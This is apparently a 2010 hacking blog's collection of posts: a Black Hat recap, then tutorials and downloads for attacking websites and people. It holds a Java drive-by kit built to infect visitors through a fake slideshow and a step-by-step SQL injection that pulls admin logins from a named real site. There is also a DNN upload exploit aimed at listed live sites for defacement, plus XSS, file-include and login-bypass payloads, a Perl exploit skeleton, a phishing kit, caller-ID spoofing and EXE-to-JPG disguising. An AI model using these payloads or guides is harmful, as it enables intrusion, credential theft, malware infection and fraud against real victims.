Saturday, July 31, 2010

Black Hat: The Largest Hacker Conference 2010 Best 5 Takeaways

..................................................................................................................

Black Hat: The Largest Hacker Conference 2010 Best 5 Takeaways

Black Hat, the largest and most visible hacker conference, is winding down in Las Vegas. It always brings a series of shocks and this year didn't disappoint. What did we learn this year?

1. Your money isn't safe - Researcher Barnaby Jack demonstrated how to hack automated teller machines (ATMs). He did it both by physically opening the machine and installing malware on it and by compromising it over the network. It turns out these machines, or at least some of them, aren't all that aggressively secured.

2. Your cell phone isn't safe - It was a bad week for mobile security. Project Carmen Sandiego showed that you don't have to be a phone company or government to find out who's using a particular cell phone number or where they are located. The security company Lookout revealed that Android wallpaper applications are needlessly gathering personal data. For years mobile malware has been just over the horizon, but it seems to be closer than ever to being a real problem. F-Secure's Mikko Hypponen was quoted as saying "Eventually, virus writers will realize it is easier to make money by infecting phones than it is by infecting computers."

3. Your electric service isn't safe - Jonathan Pollet, founder of Red Tiger Security, told Black Hat attendees of the weaknesses in Supervisory Control And Data Acquisition (SCADA) systems used in utilities like power companies to manage and monitor equipment. SCADA vendors and users are way behind IT generally when it comes to security. Vulnerabilities go for long times unpatched. Unnecessary software, like chat clients, are used on critical systems, which are sometimes connected to the Internet. Pollet also warned of the weak security state of "smart meters" being rolled out all over the country.

4. Your home router isn't safe - A new trick found by researcher Craig Heffner makes it easier for attackers to gain usable access to your home network. Hacking into the router can be done in many ways, but once you're in it's hard to get an address on the internal network. Heffner showed a Javascript hack that allows an attacker to use DNS Rebiding to gain an internal address. There are mitigating measures you can take, but they're complex or inconvenient.

5. Black Hat itself isn't safe - For the first time this year, Black Hat made their sessions available through a video feed, using a 3rd party service, for a $395 fee. One subscriber realized that it was easy to trick the service into providing the videos for free. It's not a good thing to show weakness like this to the Black Hat crowd.

There was some good news at the show. To add on to their recent announcement of a sandbox architecture for Reader for Windows, Adobe announced that it will be joining in Microsoft's MAPP program to provide advance notice to security vendors of vulnerability disclosures. This should help users to protect themselves better.
####################################################
----------------------------------------------------------------------------------
..........................................................................................................
 

XSSer Storm - Open Source Penetration testing tool

...............................................................................................

XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

XSSer v0.6a aka "XSSer Storm!" supports this new features:
-g DORK Process search engine dork results as target urls
(ex:inurl:vulnerable.asp?id=)
--Ge=DORK_ENGINE Search engine to use for dorking (scroogle,
duck, altavista, bing)
-c CRAWLING Crawl target hierarchy parameters (can be slow!)
--Cw=CRAWLING_WIDTH Number of urls to visit when crawling
--Dfo Encodes fuzzing IP addresses in DWORD format

####################################################
----------------------------------------------------------------------------------
..........................................................................................................

Friday, July 30, 2010

The New Java Drive-By - Now supports .jpg, .gif, and .png!

.............................................................................................

[Image: t6yxhj.png]

Example:

Notes
Listen up, if you get any errors then look at the bottom of this post before even thinking of posting!

Introduction

Welcome to my new Java Drive-By! This drive by will allow you to be "legit". What do I mean by legit? Well I mean that if you say "Come look at my sexy slideshow! *link to site*". They will go there and see a slideshow and go, okay! Now you have infected them, but are still playing with them. Good luck and please read this full post,


What You Need


Before we get started you will need to get Java JDK to compile your .java.
You will also need some pics of a hot ass girl, which can be found anywhere on the internet today. You will also need these files (all available here):

Update.java (Client)
-

This is the main thing that will transfer your virus to their computer.


Slide.java (Slideshow)
-

The slideshow will be the one to make you seem "legit".


maker.bat (Makes .jar & sig)
-

Maker.bat will conver the .java -> .class -> .jar & sig. This is ment to make your life easier.


index.html (Main Page)
-

When they visit your site this is what they will see. This html file is the key to putting it all togethor.


Java Error

Quote:'javac' is not recognized as an internal or external command, operable program or batch file.

Easy fix. If you haven't already, download Java JDK. Once you have it installed follow the step provided below.

Step 1 - Go to Start > Control Panel > System > Advanced tab > Environment Variables > System variables > Path > Edit.


Step 2 - Add a ; at the very end followed by C:\Program Files\Java\JDK VERSION\bin.

[Image: qrgrba.png]

Step 3 - Done. Now try it again.

FAQ


Q.
Wont let me type, must be something wrong with the JDK I downloaded?
A.
Just type the password, it wont show you typing it. It will just sit there blinking, it's okay just type the password. If you can't get the password right try 123456. 
########################################################
-------------------------------------------------------------------------------------------
..................................................................................................................

How to use SQL Injection? Best Online Tutorial for SQL Injection

...........................................................................................................................
How to use SQL Injection? Best Online Tutorial for SQL Injection
I receive many emails on how to hack a website using sql injection so, here is the hacking tutorial on it,
[NOTE: This is for educational purpose only.]

This is practical tutorial...! as long as this .pk site is up !

So lets start.. Hers is the website on which this live testing was done: http://www.depo.org.pk

Try to Find variables passing to inner script...

http://www.depo.org.pk/index.php?a=newsdetail&id=1

Where &id= is variable passing values to sql

Check whether it is vulnerable or Not... Put ' in place of 1 as shown below

depo.org.pk/index.php?a=newsdetail&id='

If it shows error ! Then we can apply sqli on this URL. Now we need to determine numbers of columns in current table.

Increase numbers un-till u get rid of 'The used SELECT statements have a different number of columns

+1
+1,2
+1,2,3
+1,2.3,4
+1,2,3,4,5
+1,2,3,4,5,6
+1,2,3,4,5,6,7
+1,2,3,4,5,6,7,8... ! Order to find columns... !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8

 here we get  no error.

Here, we used SQL Functions directly from browser.

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,database(),version(),4,5,6,7,8

database:- depo
version:- 5.0.45-log

------------------------------------------------


user()
database()
version()
current_user()
load_file()
hex()
unhex()
char()
concat()
group_concat()

------------------------------------------------

Now, we need to know structure of victim's mysql database

NOTE: SQL stores each column and table information in another table called as 'information_schema'

Attach SQL Query '+from+information_schema.tables+where+table_schem a=database()' @ the ending of column numbers !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables
+where+table_
schema=database()

Now, we want to fatch table structure of database named as 'depo' !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from
+information_schema.tables+where+table_schema=database()

Table names

admin,feedback,ideas,inquiry,members_detail_page,
members_detail_page_pictures,news,newsletter,
org_prod_categories,organizations,orginquiry,pages,
product_categories,products,products_pictures,profile

Now, its turn of column !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8
+from+information_schema.columns+where+table_schema=database()

Column names

id,login,password,id,name,
company,email,country,learnsite,
visits,content,graphics,loading,organization,
comments,date,id,fname,lname,nic,occupation,
designation,organization,address,
country,city,state,zip,phone,fax,email,website,
date,id,country,agency,telephone,fax,email,website,
demand,company,address,date,id,heading_one,
text_one,heading_two

Its time to fetch Id and password from Table Admin !

http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat%28login,0x3a,password%29,3,4,5,6,7,8
+from+admin

FOR EDUCATIONAL PURPOSES ONLY.
########################################################
-------------------------------------------------------------------------------------------
..................................................................................................................

credit card hacking

 .................................................................................................
lets checkit out
http://www.fakenamegenerator.com/gen-random-us-ca.php
####################################################
----------------------------------------------------------------------
.......................................................................................................

Thursday, July 29, 2010

Writing SQL Injection exploits in Perl

.................................................................................................................
[1] Introduction
[2] Little panning of Perl language used into an internet context
[3] Perl SQL Injection by examples
[4] Gr33tz to all new and former visitors and …




—+— StArT
[1] Introduction
Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot
of operation across the internet just writing a litlle bit of code. So i decided to write a similar guide to make an
easiest life to everyone who decide to start writing a perl exploit.
There are few requisites u need to proceed:
- U must know the basics operation of perl (print, chomp, while, die, if, etc etc…);
- U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc…).
Now, we are ready to start…
[2] Little panning of Perl language used into an internet context
Using a Perl code into an internet context means that u should be able to make a sort of dialog between your script and the
server side (or other..). To make this u need to use some “Perl modules”.
Those modules must be put on the head of the script. In this tut we are going to use only the “IO::Socket” module, but
there are thousand and if u are curious just search on cpan to retrieve info on every module.
[-] Using the IO::Socket module
Using this module is quite simple. To make the Perl Interpreter able to use this module u must write on the starting
of the script “use IO::Socket”. With this module u’ll be able to connect to every server defined previously, using
a chomp, look at the example.
Example:
print “Insert the host to connect: “;
chomp ($host=);
Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this
host. To do this, we must create a new sock that will be used by the interpreter to connect.
To create this we are going to write something like this:
$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";
In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new
connection, through the TCP protocol, using the port 80 and direct to the host specified in the chomp
($host=www.fbi.gov).
If connection is not possible an error message will appear ("Connecting ... Can't connect to host").
Resume:
- Proto=>TCP -------> The protocol to use (TCP/UDP)
- PeerAddr=> -------> The server/host to connect
- PeerPort=> -------> Port to use for the connection
Ok, now let's go to the next step, which is the real hearth of this tut.
[3] Perl SQL Injection
Assuming that we know what kind of SQL statement must inject, now we are going to see how to do this.
The SQL code must be treaty like a normal variable (like “$injection”).
Example:
$injection=index.php/forum?=[SQL_CODE]
This string means that we are going to inject the query into “index.php/forum” path, following the correct syntax that
will bring us to cause a SQL Injection “?=”.
Now we must create a piece of code that will go to inject this query into the host vuln.
print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
This piece of code is the most important one into the building of an exploit.
It can be considered the “validation” of the connection.
In this case the “print” command doesn’t show anything on screen, but it creates a dialogue and sends commands to the host.
In the first line the script will send a “GET” to the selected page defined into “$injection”.
In the third line it tells to the host “who/what” is making the request of “GET”. In this case this is Hacker, but it
can be “Mozilla/5.0 Firefox/1.0.4″ or other.
In the fourth line it defines the host to connect to, “$host”.
With the execution of this script we have made our injection.
Resume of the exploit:
use IO::Socket
print “Insert the host to connect: “;
chomp ($host=);
$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";
$injection=index.php/forum?=[SQL_CODE]
print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
close ($sock); #this line terminates the connection
A little trick:
Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it.
Additionally, u want that your script will show the PWD on your screen.
Well, to make this, the next piece of code, could be one of the possible solutions.
while($answer = <$sock>) {
if ($answer =~ /([0-9a-f]{32})/) {
print “]+[ Found! The hash is: $1n”;
exit(); }
This string means that if the answer of the host will show a “word” made by 32 characters (”0″ to “9″ and “a” to “f”),
this word must be considered the MD5 Hash PWD and it must be showed on screen.
Conclusions:
The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one.
U could use also the module “LWP::Simple” in the place of “IO::Socket”, but u should change something into the code.
This method can be used also, not only for SQL Injection, but, for example, remote file upload or other.
##########################################
----------------------------------------------------------------------------
.................................................................................................

Wednesday, July 28, 2010

Learn How to hack websites Using DNN [Dot Net Nuke] Exploit

Hack Website Using DNN [Dot Net Nuke] Exploit

Using google DORK try to find the vulnerable website.

inurl:"/portals/0"

You can also modify this google dork according to your need & requirement

I have found these 2 website vulnerable to this attack:

http://www.wittur.se/
http://www.bsd405.org/

n00bs can also try both of these websites for testing purpose.

Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/

For e.g. in case of http://www.wittur.se ..the image is located at location- http://www.wittur.se/Portals/0/SHM.jpg

Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.

Now here is the exploit

Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

HOW TO RUN ?

Simply copy paste it as shown below:

www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site

After selecting the third option, replace the URL bar with below script

javascript:__doPostBack('ctlURL$cmdUpload','')

After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT  you have hacked the website.




###############################################
---------------------------------------------------------------
.....................................................................................................

Tuesday, July 27, 2010

What is XSS (Cross-Site Scripting)

....................................................................................................................
This vulnerability allows for an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)
Example Vulnerable Code - search.php (PHP)

PHP Code:

 
$s $_GET['search'];// a real search engine would do some database stuff  hereecho("You searched for $s. There were no results found");?>
Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "XSS". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to

goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=
###########################################################
------------------------------------------------------------------------------------
............................................................................................................................

What is RFI/LFI (Remote/Local File Include)

...........................................................................................................
Description
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code - index.php (PHP)



PHP Code:
$page $_GET['p'];
if (isset(
$page)) {
    include(
$page);
} else {
    include(
"home.php");
}
?>

Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server

PHP Code:
unlink("index.php");system("echo Hacked > index.php");?>
and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.
##########################################
----------------------------------------------------------------------------
.................................................................................................

What is SQL Injection?

SQL Injection

                                                                  What is SQL?

The word SQL stands for structure query language.A language that can communicate with Database.
SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.
 
Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of a vulnerable login code
 PHP CODE


$user $_POST['u'];$pass $_POST['p'];

if (!isset(
$user) || !isset($pass)) {
    echo(
"");
} else {
    
$sql "SELECT `IP` FROM `users` WHERE `username`='$user' 

            AND `password`='$pass'";
    
$ret mysql_query($sql);
    
$ret mysql_fetch_array($ret);
    if (
$ret[0] != "") {
        echo(
"Welcome, $user.");
    } else {
        echo(
"Incorrect login details.");
    }
}
?>

Basically what this code does, is take the username and password input, and takes the users's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
 
Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable.

The Example Exploit
 
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail.
 ######################################################
-------------------------------------------------------------------------------------------
....................................................................................................................

The Basics of Hacking

I will be writing about the basics of hacking servers; I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this. And if you don't know what a word means, Google or Wiki it!; if you don't understand a concept, post here and I will try to clarify. Thanks for reading, hope this helps.

Tools Required:
Port Scanner - nmap - http://nmap.org/
Worlds No1 Browser - FireFox - http://firefox.com/



Daemon Vulnerabilities:
Description....

Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows for an attacker to send some sort of input to them, and they either crash, or in worse cases, they run any code the attacker chooses.
Scanning For Vulnerabilites

Well, this is where a little common sense comes in, because we need to answer one question: Which ports to scan? Well, with a little googling, we'd know that the default port for the HTTPD (web daemon) is 80, for the FTPD it's 21, etc. So if we wanted to know the version of the HTTPD running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open, and won't provide us with the daemon's version. This is great and all, but we don't want to just scan one port at a time do we? Well nmap has us covered there, so just scan multiple ports by seperating each target port with a comma (,) like so: "nmap targetsite.com -p 21,80 -sV". However, if you don't mind the scan taking a while longer, you can scan a range of ports like so: "nmap targetsite.com -p 1-1000 -sV". This will scan all ports between 1 and 1000.

Checking For Vulnerability

After your scan has finished, nmap will display the open ports on your target, along with their version (if they were identifiable, usually they are). An example return would look like this: "80/tcp open http Apache httpd 2.0.32". Taking this information, we search on milw0rm for "Apache". After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.

Using the Exploits
This varies, depending on the language that the exploit is coded in; google on how to do this, since it would just be wasting my time how to use all of the different languages here.

Common Web-Script Vulnerabilities
Description
In this section, I will be writing about vulnerabilities in a webserver's server-sided code. Here are the topics I will be covering:
  • SQL Injection
  • (Cross-Site Scripting)
  • (Remote/Local File Include)
#################################################
-------------------------------------------------------------------
...................................................................................................................

Sunday, July 25, 2010

Download Best Hacking Videos Taken From milw0rm.com


........................................................................................................


  • Rooting SQL Server via SQL Injection by gsy
  • Aircrack-ptw by FBi
  • Hacking Mac OS X – A Case Study by skillTube
  • Hacking SQL in Linux
  • using the SecureState Swiss Army Knife by rel1k
  • LSO: MSFweb 3.0 part 2 by ChrisG
  • The dangers of Ad-Hoc networks in Windows XP SP2 by rel1k
  • Classical Basic Local Buffer Overflow by UniquE-Key
  • How To Founding Win32 Stack Overflow Exploit by pang0
  • Cursed Animations from teh Wi1d W3st by muts
  • Windows Shellcode by Xnuxer Research
  • faking wep using linux wifislax by Komtec1
  • Clientless WEP Cracking (fragmentation attack using the air crack suite) by muts
  • Local JPG shell Inclusion (LFI using php injected JPG) by Codebreak
  • XSS injection in image formats // Taking advantages on it by diwou
  • CA BrightStor ARCserve Backup Remote Heap Overflow Vulnerability by LSsecurity
  • Quicktime Media 0day Exploit Video by ZoNe_VoRTeX
  • [Win32] Learn Stack Overflow Exploitation – Part 2 by Aelphaeis Mangarae
  • Cracking the Bluetooth Pin and Link key by Thierry Zoller
  • RealVNC V4.1.1 Bypass Authentication Exploit Video by r0t0r00t3r
  • VNC Authentication Bypass Vulnerability Video by CwG GeNiuS
  • Metasploit 3 Video (msfconsole with db_autopwn) by nnp
  • Ettercap Video by Yugal.ras
  • A Small Rooting Video by SeventotheSeven
  • [Win32] Learn Stack Overflow Exploitation – Part 1 by Aelphaeis Mangarae
  • Attack on Windows Systems based on the ActiveX Vulnerability by Michal Bucko
  • MSF-eXploit Builder in Action by Athias
  • How to Exploit Stack Base Buffer Overrun Under Windows XP SP2 by Omega7
  • Dns Spoofing by Febranio
  • Terminal Server / RDP Cracking by ChrisG
  • MS-SQL Exploitation Video by
  • RealVNC 4.1 Authentication Bypass using Metasploit Framework by ChrisG
  • Exploiting Microsoft RPC DCOM using Metasploit Framework by ChrisG
  • Webmin File Disclosure Demo by pseudo
  • WMF + SWF Exploit by ZoNe_VoRTeX
  • Cross Site scripting HQ 0 Day by fUSiON
  • Windows Server Rooting (Remote Desktop Connection) by Chironex Fleckeri
  • 0-DAY Simple SQL Injection by x128
  • Intruders D-Link Wireless Access Point
  • Configuration Disclosure by diesl0w
  • vBulletin XSS Demonstration with Session Hijacking by splices
  • CRLF (Carriage Return and Line Feed) Injection Demonstration by Paisterist
  • PHP Remote File Inclusion / Windows Backdoor by WiLdBoY
  • Heap Overflow Basics (Spanish) by Paisterist
  • (WBB Portal) Cross-Site scripting Using Unsanitized jpg File by Tontonq
  • Multiple Websites Embedded SWF File Vulnerability Demonstration by Shadow
  • Simple ASP Administrator SQL Injection by (ruiner_zer0) by ruiner_zer0
  • JPortal CMS SQL Injection Exploit in Action by (ruiner_zer0) by ruiner_zer0
  • phpBB Session Handling Authentication Bypass Demonstration by ruiner_zer0
  • JSP 1 or 1 SQL Injection Demonstration by (ruiner_zer0) by ruiner_zer0
  • Demonstration of Blind MySQL Injection (bsqlbf) by aramosf
  • Demonstration of Blind MySQL Injection (mysql_bftools) by reversing
  • KF Hacking up Bluetooth with his WIDCOMM Code by Kevin Finisterre
  • Tunneling Exploits Through SSH (whoppix) by muts
  • Cracking WEP in 10 Minutes (kismac) by Oliver Greiter
  • Muts Showing WMF 0day in Action (metasploit) by muts
  • Reverse Engineering with LD_PRELOAD by Qnix
  • Qnix Demonstrating Exploration of Simple Buffer Overflows by Qnix
  • Cracking WEP in 10 Minutes (whoppix) by muts
Download from Hotfile:

Download from Uploading:
##########################################################
-------------------------------------------------------------------------------------------
,,,,,,,,,,,,,,,,,,,,,,,,,,................................................................................................

Monday, July 19, 2010

Game Boost 1.7.5.2010 | 6.54 MB

..................................................................................................................................
GameBoost 1.7.5.2010


Game Boost 1.7.5.2010 | 6.54 MB

GameBoost - program your computer's settings for his best work during the games and surfing the Internet. GameBoost is based on the programs GameGain and Throttle. The utility, which optimizes your computer for maximum performance in online games and internet connection. Made changes to the registry and system files to enhance memory performance, image rendering, animation, speed Internet connections. All changes are made in accordance with the operating system and the type of Internet connection.

Changes in GameBoost - Updated and fixed the Windows 7 components which were causing random crashes for a small number of users running Windows in July 1964-bit.

Language: English


OS: Windows All


Medician: Yes



DOWNLOAD LINKS:


DepositFiles ||  HotFile
#####################################################3
------------------------------------------------------------------------
...............................................................................................................

Video Tutorial: AppDev Microsoft SQL Server 2010 For Developers DVD | 2.2 GB

.....................................................................................................................
Video Tutorial: AppDev Microsoft SQL Server 2010 For Developers DVD | 2.2 GB

In this course, you’ll learn about the features that are available in SQL Server, how to design and create a database, and how to build basic queries using Transact-SQL, the language of SQL Server. Then, you’ll learn how to build effective views, stored procedures, triggers, and user-defined functions using Transact-SQL. You’ll learn how to use the Transact-SQL programming language for error handling and hierarchical queries, dealing with complex data structures and processes, how to make your databases more scalable through partitioning, and how to use .NET languages like Visual C# and Visual Basic to build database objects.

Hotfile
http://hotfile.com/dl/55780916/3ea08ae/AppSQL-.part01.rar.html
http://hotfile.com/dl/55435878/4d73c7e/AppSQL-.part02.rar.html
http://hotfile.com/dl/55781031/547fe46/AppSQL-.part03.rar.html
http://hotfile.com/dl/55783034/b88fe4d/AppSQL-.part04.rar.html
http://hotfile.com/dl/55781185/0ff5d9e/AppSQL-.part05.rar.html
http://hotfile.com/dl/55781312/4123969/AppSQL-.part06.rar.html
http://hotfile.com/dl/55781350/2eed457/AppSQL-.part07.rar.html
http://hotfile.com/dl/55781386/895a35e/AppSQL-.part08.rar.html
http://hotfile.com/dl/55782679/089673e/AppSQL-.part09.rar.html
http://hotfile.com/dl/55782681/a35e930/AppSQL-.part10.rar.html
http://hotfile.com/dl/55781480/bd3a5fd/AppSQL-.part11.rar.html
http://hotfile.com/dl/55781677/447d011/AppSQL-.part12.rar.html
http://hotfile.com/dl/55781506/bf1b1f7/AppSQL-.part13.rar.html
http://hotfile.com/dl/55781665/d5866ea/AppSQL-.part14.rar.html
http://hotfile.com/dl/55782191/926ecc3/AppSQL-.part15.rar.html
http://hotfile.com/dl/55782223/0e05591/AppSQL-.part16.rar.html
http://hotfile.com/dl/55782265/00cf49f/AppSQL-.part17.rar.html
http://hotfile.com/dl/55782293/53b873e/AppSQL-.part18.rar.html
http://hotfile.com/dl/55782404/a16a6c8/AppSQL-.part19.rar.html
http://hotfile.com/dl/55782340/40c8ae9/AppSQL-.part20.rar.html
http://hotfile.com/dl/55782368/7876d0f/AppSQL-.part21.rar.html


Fileserve
http://www.fileserve.com/file/p4yeH4p/AppSQL-.part01.rar
http://www.fileserve.com/file/AcmRmNx/AppSQL-.part02.rar
http://www.fileserve.com/file/fd5Ce3H/AppSQL-.part03.rar
http://www.fileserve.com/file/vMxBn4p/AppSQL-.part04.rar
http://www.fileserve.com/file/N4r53Zp/AppSQL-.part05.rar
http://www.fileserve.com/file/g7dMJ4p/AppSQL-.part06.rar
http://www.fileserve.com/file/Ex45Kmx/AppSQL-.part07.rar
http://www.fileserve.com/file/RTczJMZ/AppSQL-.part08.rar
http://www.fileserve.com/file/NrQkk4k/AppSQL-.part09.rar
http://www.fileserve.com/file/hHNrwv5/AppSQL-.part10.rar
http://www.fileserve.com/file/MzCq5VN/AppSQL-.part11.rar
http://www.fileserve.com/file/2zN75MJ/AppSQL-.part12.rar
http://www.fileserve.com/file/vYqjS8f/AppSQL-.part13.rar
http://www.fileserve.com/file/R3qjac5/AppSQL-.part14.rar
http://www.fileserve.com/file/6WPRNfA/AppSQL-.part15.rar
http://www.fileserve.com/file/cDa87NH/AppSQL-.part16.rar
http://www.fileserve.com/file/2pbUxTR/AppSQL-.part17.rar
http://www.fileserve.com/file/Rq3Gz8A/AppSQL-.part18.rar
http://www.fileserve.com/file/qCzjY9Y/AppSQL-.part19.rar
http://www.fileserve.com/file/gEEPnzm/AppSQL-.part20.rar
http://www.fileserve.com/file/5f94yku/AppSQL-.part21.rar
http://www.fileserve.com/file/YQssQhu/AppSQL-.part22.rar
http://www.fileserve.com/file/UpAH9wf/AppSQL-.part23.rar
########################################
---------------------------------------------------
...............................................................................

Download C++ Tutorials Collection | 570.53 MB

.......................................................................

  • C++ Console
  • C++ MFC
  • C++ Misc
  • C++ OpenGL
  • c++ programs
  • C++ video classes
  • C++ Win32
  • Visual C++
  • VTC – C++ movies
Download(Hotfile)
http://hotfile.com/dl/55938206/bb207a6/C___TUTORIALS_COLLECTION.part1.rar.html
http://hotfile.com/dl/55938212/15466d9/C___TUTORIALS_COLLECTION.part2.rar.html
http://hotfile.com/dl/55938177/f105e06/C___TUTORIALS_COLLECTION.part3.rar.html

Download(Uploading)
http://uploading.com/files/2a999d6a/C___TUTORIALS_COLLECTION.part1.rar/
http://uploading.com/files/m1af62cb/C___TUTORIALS_COLLECTION.part2.rar/
http://uploading.com/files/163f6683/C___TUTORIALS_COLLECTION.part3.rar/

Download(Sharingmatrix)
http://sharingmatrix.com/file/13487815/C___TUTORIALS_COLLECTION.part1.rar
http://sharingmatrix.com/file/13487849/C___TUTORIALS_COLLECTION.part2.rar
http://sharingmatrix.com/file/13487947/C___TUTORIALS_COLLECTION.part3.rar

Download(Fileserve)
http://www.fileserve.com/file/6YxHzRc/C___TUTORIALS_COLLECTION.part1.rar
http://www.fileserve.com/file/D23Arsp/C___TUTORIALS_COLLECTION.part2.rar
http://www.fileserve.com/file/42Kpqr8/C___TUTORIALS_COLLECTION.part3.rar
####################################################
------------------------------------------------------------------------------------
........................................................................................................

Sunday, July 18, 2010

Easy - Auto Phisher Maker v2.7.7

Sreenshot: [from older version]



DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm


Code:
http://rapidshare.com/files/386795727/Easy_-_Auto_Phish
################################################################3
----------------------------------------------------------------------------------------
........................................................................................................................................

Hyderabad Electric Supply Company www.hesco.gov.pk website hacked By Adnan Anjum And Team

HESCO-- Hyderabad Electric Supply Company www.hesco.gov.pk website hacked by PUNJABI HACKERS. Don't worry, no change in any schedule & nothing has been deleted. Also no page has been uploaded as this is very critical website for PAKISTAN, so we have respect for such BIG CRITICAL sites. Its not working now. Seems down for patching up the vulnerabilities.Special Thanks To Amarjeet Singh.

WE CAN MANAGE ALL SCHEDULING

###################################################
-----------------------------------------------------
..................................................................................................

Pakistani Hackers

Latest Defacement of Indian Website (http://iinas.info/) by Pakistani Hackers

Pakistani Hackers are on FIRE..
Indian Hackers are also not Behind.

###################################
------------------------------------
............................................................................

Wednesday, July 14, 2010

Call Spoofing

Earlier there was a call spoofing method but its not working now, But I have come across a new method fully working. Use it to call anyone using anybode else's number. You can also change your voice pitch so that the other person can't recognize you.

Warning-Only for educational purposes.
  • 1. Open http://www.crazycall.net
  • 2. Select your country and wait for the page to load.
  • 3. Enter the number you want to display in the first big box (Dont change the contents of small box if the fake number is of same country).
  • 4. Enter the number you wish to call in
    second big box.
  • 5. Choose voice pitch as normal (for same
    voice) or high or low pitch to change your
    voice.
  • 6. Click Get me a code.
  • 7. Dial the number shown on right and
    enter the shown code when asked.
  • ##############################################################3
  • -------------------------------------------------------------------------------------------------------
  • .................................................................................................................................

EXE to JPG Converter

...........................................................................................................................








Download Code :-


Code:
http://www.megaupload.com/?d=B1XJZIF3
##################################################3
-----------------------------------------------------
.................................................... 

Prevention from Sql Injection Attack in PHP

To avoid the sql injection attack, please follow the following simple 
mechanisms in PHP
 

1) Always restrict the length of the fields of form such as don’t allow 
more than 20 characters in the fields like username and password with 
the “maxlength” property available in the html form.
 

